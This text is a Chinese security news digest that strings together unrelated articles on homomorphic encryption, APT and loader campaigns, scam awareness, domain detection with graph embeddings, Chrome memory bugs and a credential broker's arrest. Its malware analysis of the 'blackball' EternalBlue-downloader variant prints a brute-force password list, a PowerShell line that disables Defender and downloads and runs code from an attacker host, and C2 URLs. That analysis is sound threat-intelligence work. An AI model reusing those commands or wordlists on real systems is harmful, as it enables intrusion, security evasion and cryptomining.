现代加密技术令人们可以在传输和存储过程中保护敏感数据，但在数据处理时，却几乎无法对其进行保护。而完全同态加密（Fully Homomorphic Encryption，FHE）技术能够解决这一难题，它允许在保持加密状态的情况下对数据进行操作，最大程度上降低了数据暴露的风险。 起初，允许对加密数据进行处理的密码方案仅限于部分同态方案，该方案只能支持一种基本操作，即加法或乘法，无法同时支持两者。2009 年，IBM 在这方面取得了重大进展，并发明了完全同态加密，它同时支持两种基本操作，因此可以在不访问数据的情况下进行数据处理。结合其他技术，FHE 还可以有选择地限制解密功能，人们只能看到他们有权访问的文件部分。近年来，由于算法的发展，完全同态加密已达到拐点，其性能正在变得更加实用。 FHE 在许多用例中都具有重大前景，包括但不限于：从私人数据中提取价值（例如分析用户数据）、数据集交集、基因组学分析、不显示意图的查询和安全的外包。IBM 指出，FHE 特别适合金融和医疗保健等行业，因为该技术可以广泛共享财务信息或患者健康记录，同时限制了对除必要数据以外的所有数据的访问。 但 FHE 的要求会使开发者所习惯的编程范例发生变化，将它集成到应用程序中不是一件易事。因此，IBM 开发并开源了一套工具包，帮助开发人员简单、快速地启用这项技术。 目前，适用于 MacOS 和 iOS 的新 FHE 工具包已发布，Linux 和 Android 的将于数周之内提供。根据 IBM 的介绍，每个工具包都基于 HELib（世界上最成熟、功能最全的加密库），其中包含一些示例程序，可简化基于 FHE 的代码的编写。iOS 工具包还提供了对加密数据库的隐私保护搜索的简单演示。 IBM 表示，希望尽快将这项技术推出去，交付给早期采用者；希望在建立用户和用例社区时，这些概念变得不那么抽象，更具体。     （稿源：开源中国，封面源自网络。）

在调查关于Cycldek组织2018年后有关攻击活动时，发现对该组织的信息了解甚少。本文旨在弥合对该组织的知识鸿沟，了解其最新活动和操作方式。以下是关于该组织的相关信息： Cycldek（也称为Goblin Panda和Conimes）在过去两年中一直很活跃，对东南亚地区国家政府进行了针对性的攻击活动。 相关活动的分析显示了两种不同的模式，表明该组织是由一个领导管理的两个运营实体组成。 我们检测发现到了用于目标网络的横向移动和信息窃取的工具，其中包括自定义工具、未报告工具以及二进制文件。 最新公布的工具之一被命名为USBCulprit，其通过USB媒体来提取受害者的数据。这表明Cycldek可能正试图到达受害者环境中的气隙网络，或依靠物理存在达到同样的目的。   … 更多内容请至Seebug Paper阅读全文：https://paper.seebug.org/1230/     消息来源：securelist， 译者：dengdeng。 本文由 HackerNews.cc 翻译整理，封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/QEE95HTKzuT4-NykfvHfGQ   一、背景 腾讯安全威胁情报中心检测到永恒之蓝下载器木马出现最新变种，此次变种的病毒延续上个版本的邮件蠕虫攻击方法，利用附带Office漏洞CVE-2017-8570漏洞的doc文档以及JS诱饵文件发送与新冠肺炎主题相关的钓鱼邮件。同时新增SMBGhost（CVE-2020-0796）漏洞检测和上报、新增SSH爆破攻击相关代码，推测其可能在后续攻击活动中利用SMBGhost漏洞、也可能发起针对Linux系统的攻击。 病毒Payload执行时安装随机名计划任务从新的C2地址t.zer9g.com、t.zz3r0.com下载a.jsp进行持久化攻击，a.jsp继续下载攻击模块if.bin、if_mail.bin以利用漏洞、弱口令爆破、钓鱼邮件群发等方式进行攻击传播，将XMRig门罗币矿机程序m6.bin、m6g.bin注入Powershell.exe运行。病毒还会安装没有实际功能的计划任务blackball（“黑球”），因此将此次攻击命名为“黑球”行动。 二、样本分析 1.钓鱼邮件攻击 首先从outlook应用程序会话中获取邮箱联系人。 然后自动生成readme.doc，readme.js两种附件文件，并将readme.js制作为压缩包readme.zip。其中readme.doc中包含Office漏洞CVE-2017-8570触发代码。readme.js中包含恶意Wscript脚本攻击代码。两种附件被打开后都会执行恶意命令下载http[:]//d.ackng.com/mail.jsp。 在$mail.Body中添加待发送邮件的邮件主题内容，从预置的9个主题中随机选择，主要包含“新冠肺炎COVID-19”， “日常联系对话”，“文件损坏无法查看”三种类型，具体内容如下： 生成的钓鱼邮件示例如下： 最后针对邮箱中发现的每一个联系人，依次发送包含恶意代码的附件readme.doc、readme.zip的邮件。 2.弱口令爆破 RDP（3389端口）弱口令爆破 爆破用户名：“administrator”，密码字典： `”saadmin”,“123456”,“test1”,“zinch”,“g_czechout”,“asdf”,“Aa123456.”,“dubsmash”,“password”,“PASSWORD”,“123.com”,“admin@123”,“Aa123456”,“qwer12345”,“Huawei@123”,“123@abc”,“golden”,“123!@#qwe”,“1qaz@WSX”,“Ab123”,“1qaz!QAZ”,“Admin123”,“Administrator”,“Abc123”,“Admin@123”,“999999”,“Passw0rd”,“123qwe!@#”,“football”,“welcome”,“1”,“12”,“21”,“123”,“321”,“1234”,“12345”,“123123”,“123321”,“111111”,“654321”,“666666”,“121212”,“000000”,“222222”,“888888”,“1111”,“555555”,“1234567”,“12345678”,“123456789”,“987654321”,“admin”,“abc123”,“abcd1234”,“abcd@1234”,“abc@123”,“p@ssword”,“P@ssword”,“p@ssw0rd”,“P@ssw0rd”,“P@SSWORD”,“P@SSW0RD”,“P@w0rd”,“P@word”,“iloveyou”,“monkey”,“login”,“passw0rd”,“master”,“hello”,“qazwsx”,“password1”,“Password1”,“qwerty”,“baseball”,“qwertyuiop”,“superman”,“1qaz2wsx”,“fuckyou”,“123qwe”,“zxcvbn”,“pass”,“aaaaaa”,“love”,“administrator”,“qwe1234A”,“qwe1234a”,“123123123”,“1234567890”,“88888888”,“111111111”,“112233”,“a123456”,“123456a”,“5201314”,“1q2w3e4r”,“qwe123”,“a123456789”,“123456789a”,“dragon”,“sunshine”,“princess”,“!@#$%^&*”,“charlie”,“aa123456”,“homelesspa”,“1q2w3e4r5t”,“sa”,“sasa”,“sa123”,“sql2005”,“sa2008”,“abc”,“abcdefg”,“sapassword”,“Aa12345678”,“ABCabc123”,“sqlpassword”,“sql2008”,“11223344”,“admin888”,“qwe1234”,“A123456”,“OPERADOR”,“Password123”,“test123”,“NULL”,“user”,“test”,“Password01”,“stagiaire”,“demo”,“scan”,“P@ssw0rd123”,“xerox”,“compta”`。 爆破成功后会上报该机器的IP以及此次成功登陆使用的密码，然后利用rdpexec模块远程执行代码$rdp_code: cmd /c powershell Set-MpPreference-DisableRealtimeMonitoring 1;Add-MpPreference -ExclusionProcess c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe&powershellIEX(New-Object Net.WebClient).DownloadString(”http[:]//t.amynx.com/rdp.jsp”) SMB爆破攻击（445端口） 爆破使用用户名为”administrator”,”admin”，爆破成功后远程执行代码$ipc_code： MSSQL爆破攻击（1433端口） 使用与RDP爆破同样的密码字典，爆破成功后远程执行代码$mscmd_code： 此外，最新的攻击代码中还加如了SSH爆破相关命令，该代码将会启动SSH爆破模块，并在爆破成功后执行远程命令$ssh_cmd。但是目前该功能并未启用，相关可能还在开发阶段，后续如果启用之后，可能会导致被感染的Windows机器通过SSH爆破攻击Linux系统。 3.漏洞攻击 1)   SMBGhost漏洞利用 永恒之蓝下载器木马变种会利用公开的漏洞检测代码检测存在SMBGhost漏洞（编号：CVE-2020-0796、绰号：永恒之黑）的机器IP并上报。 2020年3月12日腾讯安全威胁情报中心发布了SMBv3远程代码执行漏洞CVE-2020-0796（别名：SMBGhost，绰号：永恒之黑）预警公告：https://mp.weixin.qq.com/s/zwuDziMherWbUY2S2rrD8Q 2020年6月2日，国外安全研究员公开了一份SMBGhost漏洞CVE-2020-0796漏洞的RCE代码，腾讯安全团队已对其进行分析并预警：https://mp.weixin.qq.com/s/LDWRacyVMAu2JGZUJf3qKQ 该漏洞的后果十分接近永恒之蓝系列，都利用Windows SMB漏洞远程攻击获取系统最高权限，除了直接攻击SMB服务端造成RCE外，攻击者可以构造特定的网页，压缩包，共享目录，OFFICE文档等多种方式触发漏洞进行攻击。由于漏洞利用源代码被公布，使得漏洞利用风险骤然升级，被黑灰产修改即可用于网络攻击。 2)   永恒之蓝漏洞利用 利用永恒之蓝漏洞攻击，攻击后远程执行代码$sc_code。 3)   Lnk漏洞（CVE-2017-8464）利用 Lnk漏洞利用CVE-2017-8464，在可移动盘、网络磁盘下创建具有CVE-2017-8464漏洞攻击代码的Lnk文件，一旦该文件被查看就会导致恶意代码执行。同时还会释放JS文件readme.js，通过伪装的文件在被误点击时感染病毒。 4.清除竞品挖矿木马 永恒之蓝下载器木马在攻击代码if.bin中Killer()函数中会详细地搜集大量竞争对手挖矿木马的信息，包括各类挖矿木马安装的服务、计划任务、进程名，以及挖矿使用的命令行特点、端口号特点来锁定目标并进行清除。 通过服务名匹配： `$SrvName =“xWinWpdSrv”, “SVSHost”, “Microsoft Telemetry”, “lsass”, “Microsoft”, “system”, “Oracleupdate”, “CLR”, “sysmgt”, “\gm”, “WmdnPnSN”, “Sougoudl”,“National”, “Nationaaal”, “Natimmonal”, “Nationaloll”, “Nationalmll”,“Nationalaie”,“Nationalwpi”,“WinHelp32”,“WinHelp64”, “Samserver”, “RpcEptManger”, “NetMsmqActiv Media NVIDIA”, “Sncryption Media Playeq”,“SxS”,“WinSvc”,“mssecsvc2.1”,“mssecsvc2.0”,“Windows_Update”,“Windows Managers”,“SvcNlauser”,“WinVaultSvc”,“Xtfy”,“Xtfya”,“Xtfyxxx”,“360rTys”,“IPSECS”,“MpeSvc”,“SRDSL”,“WifiService”,“ALGM”,“wmiApSrvs”,“wmiApServs”,“taskmgr1”,“WebServers”,“ExpressVNService”,“WWW.DDOS.CN.COM”,“WinHelpSvcs”,“aspnet_staters”,“clr_optimization”,“AxInstSV”,“Zational”,“DNS Server”,“Serhiez”,“SuperProServer”,“.Net CLR”,“WissssssnHelp32”,“WinHasdadelp32”,“WinHasdelp32”,“ClipBooks”` 通过计划任务名匹配： `$TaskName = “my1″,”Mysa”, “Mysa1”, “Mysa2”, “Mysa3”, “ok”, “Oracle Java”, “Oracle Java Update“, “Microsoft Telemetry“, “Spooler SubSystem Service“,”Oracle Products Reporter“, “Update service for products“, “gm“, “ngm“,”Sorry“,”Windows_Update“,”Update_windows“,”WindowsUpdate1“,”WindowsUpdate2“,”WindowsUpdate3“,”AdobeFlashPlayer“,”FlashPlayer1“,”FlashPlayer2“,”FlashPlayer3“,”IIS“,”WindowsLogTasks“,”System Log Security Check“,”Update“,”Update1“,”Update2“,”Update3“,”Update4“,”DNS“,”SYSTEM“,”DNS2“,”SYSTEMa“,”skycmd“,”Miscfost“,”Netframework“,”Flash“,”RavTask“,”GooglePingConfigs“,”HomeGroupProvider“,”MiscfostNsi“,”WwANsvc“,”Bluetooths“,”Ddrivers“,”DnsScan“,”WebServers“,”Credentials“,”TablteInputout“,”werclpsyport“,”HispDemorn“,”LimeRAT-Admin“,”DnsCore“,”Update service for Windows Service“,”DnsCore“,”ECDnsCore“` 通过命令行特征匹配： `$_.CommandLine -like‘*pool.monero.hashvault.pro*’ –Or $_.CommandLine -like ‘*blazepool*’ –Or$_.CommandLine -like ‘*blockmasters*’ –Or $_.CommandLine -like‘*blockmasterscoins*’ –Or $_.CommandLine -like ‘*bohemianpool*’ –Or$_.CommandLine -like ‘*cryptmonero*’ –Or $_.CommandLine -like ‘*cryptonight*’–Or $_.CommandLine -like ‘*crypto-pool*’ –Or $_.CommandLine -like‘*–donate-level*’ –Or $_.CommandLine -like ‘*dwarfpool*’ –Or $_.CommandLine-like ‘*hashrefinery*’ –Or $_.CommandLine -like ‘*hashvault.pro*’ –Or$_.CommandLine -like ‘*iwanttoearn.money*’ –Or $_.CommandLine -like‘*–max-cpu-usage*’ –Or $_.CommandLine -like ‘*mine.bz*’ –Or $_.CommandLine-like ‘*minercircle.com*’ –Or $_.CommandLine -like ‘*minergate*’ –Or$_.CommandLine -like ‘*miners.pro*’ –Or $_.CommandLine -like ‘*mineXMR*’ –Or$_.CommandLine -like ‘*minexmr*’ –Or $_.CommandLine -like ‘*mineXMR*’ –Or$_.CommandLine -like ‘*mineXMR*’ –Or $_.CommandLine -like‘*miningpoolhubcoins*’ –Or $_.CommandLine -like ‘*mixpools.org*’ –Or$_.CommandLine -like ‘*mixpools.org*’ –Or $_.CommandLine -like ‘*monero*’ –Or$_.CommandLine -like ‘*monero*’ –Or $_.CommandLine -like‘*monero.lindon-pool.win*’ –Or $_.CommandLine -like ‘*moriaxmr.com*’ –Or $_.CommandLine-like ‘*mypool.online*’ –Or $_.CommandLine -like ‘*nanopool.org*’ –Or$_.CommandLine -like ‘*nicehash*’ –Or $_.CommandLine -like ‘*-p x*’ –Or$_.CommandLine -like ‘*pool.electroneum.hashvault.pro*’ –Or $_.CommandLine-like ‘*pool.xmr*’ –Or $_.CommandLine -like ‘*poolto.be*’ –Or $_.CommandLine-like ‘*prohash*’ –Or $_.CommandLine -like ‘*prohash.net*’ –Or $_.CommandLine-like ‘*ratchetmining.com*’ –Or $_.CommandLine -like ‘*slushpool*’ –Or$_.CommandLine -like ‘*stratum+*’ –Or $_.CommandLine -like ‘*suprnova.cc*’ –Or$_.CommandLine -like ‘*teracycle.net*’ –Or $_.CommandLine -like ‘*usxmrpool*’–Or $_.CommandLine -like ‘*viaxmr.com*’ –Or $_.CommandLine -like ‘*xmrpool*’–Or $_.CommandLine -like ‘*yiimp*’ –Or $_.CommandLine -like ‘*zergpool*’ –Or $_.CommandLine-like ‘*zergpoolcoins*’ –Or $_.CommandLine -like ‘*zpool*’` 通过网络端口匹配： `($psids[0] -eq $line[-1]) –and $t.contains(“ESTABLISHED”) –and ($t.contains(“:1111”) –or $t.contains(“:2222”) –or $t.contains(“:3333”) –or $t.contains(“:4444”) –or $t.contains(“:5555”) –or $t.contains(“:6666”) –or $t.contains(“:7777”) –or $t.contains(“:8888”) –or $t.contains(“:9999”) –or $t.contains(“:14433”) –or $t.contains(“:14444”) –or $t.contains(“:45560”) –or $t.contains(“:65333”))` 通过进程名匹配： `$Miner =“SC”,“WerMgr”,“WerFault”,“DW20”,“msinfo”, “XMR*”,“xmrig*”, “minerd”, “MinerGate”, “Carbon”, “yamm1”, “upgeade”, “auto-upgeade”, “svshost”, “SystemIIS”, “SystemIISSec”, &apos;WindowsUpdater*&apos;, “WindowsDefender*”, “update”, “carss”, “service”, “csrsc”, “cara”, “javaupd”, “gxdrv”, “lsmosee”, “secuams”, “SQLEXPRESS_X64_86”, “Calligrap”, “Sqlceqp”, “Setting”, “Uninsta”, “conhoste”,“Setring”,“Galligrp”,“Imaging”,“taskegr”,“Terms.EXE”,“360”,“8866”,“9966”,“9696”,“9797”,“svchosti”,“SearchIndex”,“Avira”,“cohernece”,“win”,“SQLforwin”,“xig*”,“taskmgr1”,“Workstation”,“ress”,“explores”` 5.执行Payload 通过爆破、RCE漏洞攻击、钓鱼邮件攻击后会下载和执行Powershell代码： http[:]//t.amynx.com/mail.jsp或http[:]//t.amynx.com/usb.jsp mail.jsp更新C2地址为：t.amynx.com、t.zer9g.com、t.zz3r0.com，并且安装计划任务blackball（“黑球”），该计划任务无实际代码执行。 然后mail.jsp安装三个随机名计划任务（分别为<random>、<random>\<random>、MicroSoft\Windows\<random>），执行命令为“PS_CMD”。之后三个计划任务中的命令“PS_CMD”被替换为下载和执行Powershell代码http[:]//t.awcna.com/a.jsp、http[:]//t.zer9g.com/a.jsp、http[:]//t.zz3r0.com /a.jsp以达到持久化攻击。 a.jsp负责下载攻击模块if.bin执行漏洞利用和弱口令爆破功能。下载门罗币挖矿模块m6.bin、m6g.bin，并通过Invoke-ReflectivePEInjection将XMR挖矿木马注入Powershell.exe运行，连接矿池lplp.ackng.com:443挖矿，导致CPU占用率接近100%。 将OutLook注册表 “*\Outlook\Security”下的ObjectModelGuard值设为2，即不对outlook任何可疑活动进行提示。 然后下载和执行Powershell版邮件蠕虫攻击程序http[:]//d.ackng.com/if_mail.bin，获取邮箱所有联系人，依次发送钓鱼邮件，进入下一轮攻击流程。 6.历次版本修改 根据腾讯安全威胁情报中心持续跟踪结果，永恒之蓝下载器木马在2018~2020间，已升级十余次，历次变化情况如下： IOCs Domain t.amynx.com t.zer9g.com t.zz3r0.com d.ackng.com   URL： http[:]//d.ackng.com/if_mail.bin http[:]//d.ackng.com/if.bin http[:]//t.zer9g.com/a.jsp http[:]//t.zz3r0.com/a.jsp http[:]//t.amynx.com/mail.jsp   md5 参考链接： https://mp.weixin.qq.com/s/bibSEjfLnuOA9vyEMHkv9Q https://mp.weixin.qq.com/s/LDWRacyVMAu2JGZUJf3qKQ

我们在日常的网络监测中，对许多伪装的电子邮件进行了拦截。这些邮件利用正在发生的冠状病毒有关的FMLA（《家庭医疗休假法》）要求，使用Himera和Absent-Loader这两种网络犯罪工具对数据进行了处理。 加载程序是一种恶意代码，用于将其他恶意软件代码加载到受害者的计算机中并对数据进行窃取。攻击者们会把被盗取的信息进行售卖，来获得相应的报酬。 此恶意活动中的样本首先使用Word文档（该文档指的是可执行文件），然后再删除另一个可执行文件并进行重命名，借此来逃避检测。     … 更多内容请至Seebug Paper阅读全文：https://paper.seebug.org/1226/     消息来源：yoroi， 译者：dengdeng。 本文由 HackerNews.cc 翻译整理，封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

谷歌周四公布了一个网站，旨在教人们如何发现和避免网上诈骗，因为在冠状病毒大流行的情况下，数字骗局达到了高潮。这家名为Scamspotter.org的网站试图向人们展示如何识别虚假的医疗检查、假的疫苗优惠或其他虚假的医疗信息。该网站还强调了某些典型的骗局模式，比如恋爱诈骗者要求目标人物给他们汇款或给他们买礼品卡。 谷歌与致力于帮助网络欺诈受害者的非营利组织“网络犯罪支持网络”（Cybercrime Support Network）合作推出了这一网站。该网站包括一个小测验，通过常见的诈骗场景，比如收到一条关于赢得夏威夷之旅的消息，通过这个小测验来测试用户反欺诈的能力。 谷歌表示，这项工作是在骗子们以 “惊人的速度 “利用了新冠疫情的情况下进行的。美国人因为COVID-19相关的骗局，已经损失了超过4000万美元。联邦贸易委员会预计，今年将因冠状病毒相关或其他方面的诈骗而损失的金额将超过20亿美元。 本月早些时候，美国联邦贸易委员会警告公众关于相关联系人追踪的短信诈骗，这些骗局要求提供个人信息，如社会安全号、银行账户或信用卡号码等。谷歌和苹果公司已经发布了自己的联络人追踪工具。 谷歌表示，该网站特别针对教育老年人，他们因为诈骗而损失的钱比其他年龄段人多得不成比例。该公司敦促年轻人与生活中的老年人分享网站上的防诈骗信息。     （稿源：cnBeta，封面源自网络。）

感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/LeK6QYHwd3k3UlyAuSkcZA   一、导语 恶意域名的挖掘检测一直是威胁情报生产的核心内容。在庞大的互联网体量下，以域名为节点的访问、下载、解析等关系够成了一张无比庞大的“图”，黑客的每一次访问、请求或下载，都构成了其中具有独特结构的可疑子图，由此出发，图关系天然适用于挖掘恶意域名。本文主要讲解了图嵌入（GraphEmbedding）相关技术在腾讯安全威胁情报生产中的运用。 二、应用背景 一般的恶意域名检测（Malicious Domains Detection）[1]任务是基于特征工程和机器学习来进行恶意域名的判定，但从网络图谱的角度上来看，域名是整个图中的一个节点，它在网络图谱中，与不同的节点，如IP、md5等有不同的相邻关系，如访问、下载、解析等。如下图是腾讯安图对域名节点的网络关系展示。 对于恶意域名而言，基于其网络图谱关系，能够有效获取实锤线索。而图嵌入技术让网络关系能够进行有效的数值化表达。 三、相关技术 图嵌入往往作为一些图神经网络（GraphNeural Networks，GNN[2]）的输入特征，与词嵌入[3]类似，图嵌入基本理念是基于（非）相邻节点关系，将目的节点映射为稠密向量，这样就将图谱上的多边关系和实物节点进行了数值化，以便在下游任务中进行运用[4]。 在获取相应图嵌入后，围绕图嵌入的下游任务主要有四类：节点分类、链路预测、聚类分析和可视化分析。节点分类指对节点的类型进行分类，如判定域名节点是否为恶意；链路预测是为了判定两个节点之间是否有边相连；聚类分析是在无监督学习场景下的节点簇分析；可视化分析通常会对节点进行降维并可视化。 此外，需要注意的是，网络有同构（homogeneous networks）与异构（heterogeneous networks）之分，如用户作为节点构成的社交网络是同构网络，而如网络图谱这样，节点包括域名、IP等多种类型的是异构网络[5]。 基于同构网络进行图嵌入的代表是node2vec[6]。它的嵌入过程主要分两步：二阶随机游走（2ndorder random walk）获得节点序列和基于Skip-gram[3]训练节点嵌入。在二阶随机游走中，算法通过p、q两个超参数来控制游走到不同类型图节点的概率，如下图： 是未归一化概率，其取值由超参数p、q确定，其中代表了出发节点v的下一步节点x跟上一个节点t的三种相邻关系：相邻、不相邻和自身，如下图： 不同的p、q值，实现了对图节点两种相似性的偏好控制：同构性（homophily）和结构对等性（structural equivalence）。通过p、q的值，控制Breadth-first Sampling和Depth-first Sampling，进而将同构性和结构对等性采样到节点序列中。 此后，使用skip-gram对游走的序列结果进行训练，得到关于每个节点的稠密向量。 四、基于图嵌入的恶意域名挖掘 4.1 基于图嵌入的域名情报挖掘架构 腾讯安全威胁情报中心基于海量安全大数据，在知识图谱、图计算等方面有深入的研究。在图神经网络的应用方面，实现了基于多种类型图结构的域名节点的嵌入与判定。 下图是目前在域名情报图嵌入构建的主要架构。首先根据域名与其他实体的关联关系，构建域名的同构关系图，然后基于图嵌入技术训练域名的图嵌入表示，最后根据具体的需求，结合其他维度的数据，实现相应任务。 下面对其中基于样本下载关系的同构域名图嵌入实现进行详述。 4.2 基于样本下载关系的同构域名图嵌入实现 域名图嵌入的其中一部分是从md5与域名的下载关系出发，来构建同构域名图，如下图。其主要构建过程包括： 抽取种子域名 黑白样本md5采样 获取下载边关系 关联域名 构建域名带权无向图 node2vec训练 特征融合与建模 4.2.1 抽取种子域名 为了构建域名下载关系同构图，需要一批种子域名，这批种子域名用以关联下载相同黑白样本md5的其他域名，以构成一张关于域名同构的图。 目前，种子域名主要由域名情报和高危域名组成，记为domains_seed。 4.2.2 黑白样本md5采样 腾讯安全多年黑灰产对抗过程中累积了海量样本的相关信息，包括样本本身的黑白灰属性，为了构建域名下载关系网络，对活跃期内的样本md5进行采样，去除低广和高广的白样本和低广的黑样本。这样可以避免低广高广样本将域名网络连接成一个完全图，让不同类型域名在图上的结构具有更大的差异性，同时，降低同构网络构建过程中的内存压力，这个黑白md5集合分别记为md5_black和md5_white。 4.2.3 获取下载边关系 选取一定时间段内的从域名下载样本md5的关系数据（md5-downloaded-domain），这个数据表明了，在一定时间段内，某md5从哪些域名上下载。同时，移除md5不在md5_black和md5_white中的对应关系数据。 4.2.4 关联域名 种子域名分别与黑白样本md5关联非种子域名。 以黑样本md5为例。在md5-downloaded-domain中抽取域名在domains_seed中，而md5在md5_black中的的md5和域名的下载关系数据，记为md5 -domain-black。从md5 -domain-black获得对应的所有域名作为黑关联域名，记为domain_black_corr。 同理可得domain_white_corr。 4.2.5 构建域名带权无向图 在获得的黑白关联域名和种子域名上，通过md5-downloaded-domain构建带权无向同构域名黑白网络。 以黑关联域名为例。在md5-downloaded-domain上抽取域名为黑关联域名或种子域名、md5为黑的域名md5下载关系，并假定下载相同md5的域名是互连的，这样去掉md5，就得到了仅域名连接的多个无向边。 假设这些无向边的权重为一个基本权重单位，则假定边无向的前提下，相同边的数量作为这条边的权重。由此构建起关于黑md5的域名同构带权无向图。同理可得关于白md5的域名同构带权无向图。 4.2.6  node2vec训练 这里选取node2vec对构建的黑白带权无向图进行域名图嵌入进行训练，node2vec在节点分类上具有明显优势，适用于下游域名相关挖掘任务，如下图。 node2vec在多种评测数据上均获得了最优或近似最优的结果。 通过node2vec，分别训练获得了关于域名下载关系的黑白图嵌入。下图是通过t-SNE降维后，黑白两类域名图嵌入的散点图示。 4.2.7 特征融合与建模 在获得关于域名下载关系的黑白图嵌入后，针对具体下游任务，可以结合域名其他维度特征进行进一步分析。 在恶意域名检测任务中，结合了域名的多种嵌入和其他属性特征，构建前馈神经网络（feedforwardneural network，FNN）进行建模和域名检测。通过对图嵌入的运用，在召回相近的情况下，恶意域名检测的精确率（precise）提升了1.7个百分点，达到了93.1%。 五、总结与展望 基于图嵌入的恶意域名挖掘从域名网络关联的角度，为域名的检测提供了新的线索及其数值化方案，丰富了域名的特征的维度和检测精度。 目前，域名的各种图嵌入的构建主要基于同构网络，接下来，会继续研究异构网络在域名检测上的应用。此外，除了域名，图嵌入技术和图神经网络在IP等情报上，同样具有应用和探索的价值。 六、参考文献 [1] Zhauniarovich Y,Khalil I, Yu T, et al. A survey on malicious domains detection through DNS dataanalysis[J]. ACM Computing Surveys (CSUR), 2018, 51(4): 1-36. [2] Scarselli F,Gori M, Tsoi A C, et al. The graph neural network model[J]. IEEE Transactionson Neural Networks, 2008, 20(1): 61-80. [3] Mikolov T, ChenK, Corrado G, et al. Efficient estimation of word representations in vectorspace[J]. arXiv preprint arXiv:1301.3781, 2013. [4] Goyal P, FerraraE. Graph embedding techniques, applications, and performance: A survey[J].Knowledge-Based Systems, 2018, 151: 78-94. [5] Zhang F, Liu X, Tang J, et al. Oag: Towardlinking large-scale heterogeneous entity graphs[C]//Proceedings of the 25th ACMSIGKDD International Conference on Knowledge Discovery & Data Mining. 2019:2585-2595. [6] Grover A,Leskovec J. node2vec: Scalable feature learning for networks[C]//Proceedings ofthe 22nd ACM SIGKDD international conference on Knowledge discovery and datamining. 2016: 855-864.  

近日，有谷歌工程师分析了自 2015 年以来在 Chrome 稳定版分支中修复的 912 个安全错误。并发现，在这些被标记为“高”或“严重”等级的所有安全漏洞中，大约 70％ 是内存管理和安全问题。 这其中又有一半是 use-after-free 漏洞。这种安全问题是由对内存指针（地址）的错误管理引起的，为攻击者打开了攻击 Chrome 内部组件的大门。 这一数据恰巧与微软此前的研究结果相同：微软安全响应中心（MSRC）对自 2004 年以来所有报告过的微软安全漏洞进行了分类，所有微软年度补丁中约有 70% 是针对内存安全漏洞的修复程序。 微软安全响应中心曾给出解释，这是因为他们大多数产品使用 C 和 C++ 编写，而这两种编程语言属于“内存不安全”（memory-unsafe）的范畴。管理内存执行的开发人员代码中的一个漏洞可能导致一系列内存安全错误。 谷歌也面临着相似的境地。仅仅从 2019 年 3 月到现在，等级为“严重”的 130 个 Chrome 漏洞中，有 125 个与内存损坏相关，可见内存管理仍然是一个很大的问题。 为此，谷歌工程师必须遵循 “2 的规则”（The Rule of 2）。即每当工程师编写新的 Chrome 特性时，其代码不得破坏以下两个以上的条件： 该代码处理不可信的输入 代码在没有沙箱的情况下运行 代码使用不安全的编程语言（C/C ++）编写 迄今为止，谷歌一直在 Chrome 中尝试使用沙箱方法。他们将数十个进程隔离到自己的沙箱中，最近还推出了“站点隔离”功能，该功能将每个站点的资源也放入自己的沙箱进程中。但谷歌工程师表示，考虑到性能问题，他们使用沙盒化 Chrome 组件的方法已达到最大收益，现在必须寻求新的方法。 因此，谷歌计划研究开发自定义 C++ 库，以与 Chrome 的代码库一起使用，这些库可以更好地保护与内存相关的错误。 与此同时，谷歌还在探索 MiraclePtr 项目，该项目旨在将“use-after-free bug 转变为具有可接受的性能、内存、二进制大小和最小的稳定性影响的非安全崩溃”。 最后，值得注意的一点是，谷歌表示计划在可能的情况下使用“安全”语言进行探索。候选对象包括 Rust、Swift、JavaScript、Kotlin 和 Java。   （稿源：ZDNet，封面源自网络。）

乌克兰特勤局今日宣布逮捕了一位名叫 Sanix 的黑客，其曾通过黑客论坛和 Telegram 渠道贩卖数十亿受害用户的登陆凭证。本次逮捕发生在乌克兰西部城市 Ivano-Frankivsk，但官方为披露黑客的真名。作为地下黑客论坛的老成员，有关部门最早在 2018 年追溯到了他的线索。 在安全专家看来，Sanix 的身份更像是一位二道贩子（数据中间商 / Data Broker）。其收集了被黑客入侵的企业泄露的大量数据，将之整理汇总出大量的用户登陆凭证（ID 和密码）。 Sanix 随后将数据贩卖给其它在灰色地带从事网络犯罪的恶意行为者，比如垃圾邮件发送者、密码破解者、账户劫持者、以及暴力僵尸网络的幕后黑手。 在 Telegram 上，Sanix 也曾化名 Sanixer 。其最初负责‘组装’一系列用户名和密码组合，并打包成 #1、#2、#3、#4、#5、Antipublic 等数据集合。 这些资料涵盖了数十亿个唯一的用户名和密码组合，合计容量达到了数 TB，并且已经在私底下被贩卖多年。 然而威胁情报公司 IntSights 指出，部分资料在与另一位二道贩子 Azatej 发生纠纷后在网络上被泄露（Azatej 被认为是贩卖被盗数据的 Infinity Black 门户网站的幕后黑手）。 尽管 Azatej / Sanix 只是泄露了打包后的旧数据，却还是在 2019 年 1 月引发了媒体的强烈关注。时至今日，Collection #1 甚至在维基百科上都拥有了专属的介绍页面。 据悉，Azatej 陆续泄露了多个数据包。但在欧洲刑警组织针对 Infinity Black 采取的一系列行动中，Azatej 已于本月早些时候被逮捕。 乌克兰特勤局（SSU）在今日的新闻发布会上表示，其在 Sanix 的计算机上找到了 Collection＃1 的副本，以及至少七个类似的被盗密码数据库。 除了收集用户名和密码，Sanix 的计算机上还存储了与银行卡 PIN 码、加密货币钱包、PayPal 账号、以及 DDoS 僵尸网络有关的信息。 随后的统计发现，SSU 一共从 Sanix 的住所中查获了 2TB 的数据、以及 3000 美元和 19 万格里夫纳（约 7000 美元）的赃款。   （稿源：cnBeta，封面源自网络。）

